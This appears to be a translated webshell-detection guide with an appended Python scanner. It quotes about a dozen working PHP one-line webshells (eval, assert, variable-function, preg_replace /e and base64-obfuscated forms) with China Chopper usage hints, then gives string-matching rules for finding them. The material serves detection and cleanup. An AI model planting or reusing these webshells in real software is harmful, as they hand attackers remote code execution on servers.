Elementary: http://www.bkjia.com/Article/201405/304549.html
<?php eval($_POST[xiao])?>  # eval is uncommon in normal code; string matching will find it.
It is commonly changed into:
base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz4=)  # Match base64_decode, locate the file, and inspect its contents.
Matching on this form can be bypassed, and there are other forms:
<?php $_GET['eval']($_POST['xiao']);?>  # If eval appears in a file, or both $_GET and $_POST appear in it, output the file location.
if (key($_GET) == 'singyea') call_user_func($_GET['singyea'], $_POST['singyea']);
<?php $_GET['a']($_POST['B']);?>  # This one is relatively simple to use: test.php?a=assert, password B.
<?php assert($_POST[s]);?>  # Match assert directly.
<?php $_POST['iso']($_POST['cmd']);?>  # Two $_POST in one file: match and output the file location directly.
The password is cmd. China Chopper ("kitchen knife") configuration information: <O>iso=assert</O>
preg_replace("/[pageerror]/e", $_POST['error'], "saft");  # preg_replace and $_POST in the same file: output the file location, then check it manually.
@preg_replace("~(.*)~ies", gzuncompress($_SESSION['api']), null);  # Same matching method as above.
<?php $a = str_replace(x, "", "axsxxsxexrxxt"); $a($_POST["sz"]); ?>
<?php $s = create_function('', $_REQUEST['C']); $s(); // s.php?C=eval%28$_REQUEST[cmd]%29;&cmd=echo%201; ?>
<?php file_put_contents(base64_decode(<file name>), base64_decode(<pony base64>)); ?>
To scan for and remove one-line webshells, finding the forms above is basically all you need.
Then there are the functions Trojans use, such as fread, fwrite, mkdir, system, eval, and basename. You can look through the PHP filesystem functions. If one of these functions matches, can the code be kept?
Finally, look for the fsocket and socket functions.
These are the functions to check for traffic-flooding DDoS scripts.
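
The string matching described above, as an added example that is not part of the original page: a small Python scanner with one rule per listed form, which also decodes long base64 literals and re-scans them, one step beyond a plain keyword match. The rule names, the `scan` helper, the sample file names, and the choice of `fsockopen`/`socket_create` as the concrete socket calls are assumptions of this example.

```python
import base64, binascii, re

INPUT = r"\$_(?:GET|POST|REQUEST|SESSION)"   # request-controlled superglobals
RULES = {  # one rule per form listed above (rule names are this example's own)
    "eval": r"\beval\s*\(",
    "assert": r"\bassert\s*\(",
    "base64_decode": r"\bbase64_decode\s*\(",
    # $_GET['a']($_POST['B']) or $a($_POST["sz"]): a variable called on request data
    "variable-function": r"\$\w+(?:\s*\[[^\]]*\])?\s*\(\s*" + INPUT,
    "callback": r"\b(?:call_user_func|create_function)\s*\([^;]*" + INPUT,
    # preg_replace whose pattern string has the e modifier after its closing delimiter
    "preg_replace-e": r"\bpreg_replace\s*\(\s*([\"'])(.)(?:(?!\1).)*?\2[a-z]*e[a-z]*\1",
    "decoded-write": r"\bfile_put_contents\s*\([^;]*base64_decode",
    "socket": r"\b(?:fsockopen|socket_create)\s*\(",
}
COMPILED = {name: re.compile(rx, re.I) for name, rx in RULES.items()}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")  # long base64-looking literal

def scan(text, depth=1):
    """Return sorted rule names matching text, plus 'decoded:<rule>' for hits
    found only after base64-decoding a literal embedded in it."""
    hits = {name for name, rx in COMPILED.items() if rx.search(text)}
    if depth > 0:
        for token in B64_TOKEN.findall(text):
            try:
                inner = base64.b64decode(token, validate=True).decode("utf-8", "ignore")
            except (binascii.Error, ValueError):
                continue  # not valid base64 after all
            hits |= {"decoded:" + h for h in scan(inner, depth - 1)}
    return sorted(hits)

# Constructed inputs modelled on the forms quoted on this page, plus one benign line.
SAMPLES = {
    "plain.php": "<?php eval($_POST[xiao])?>",
    "encoded.php": '<?php $x = base64_decode("PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz4="); ?>',
    "varfunc.php": "<?php $_GET['a']($_POST['B']);?>",
    "hidden.php": '<?php $a = str_replace(x, "", "axsxxsxexrxxt"); $a($_POST["sz"]); ?>',
    "regex.php": '<?php preg_replace("/[pageerror]/e", $_POST[\'error\'], "saft"); ?>',
    "benign.php": '<?php echo preg_replace("/\\s+/i", " ", $title); ?>',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name}: {', '.join(scan(body)) or 'clean'}")
```

The str_replace sample never contains the word assert, yet it is still flagged, because the rule matches the shape of the call (a variable invoked on request data) rather than a function name.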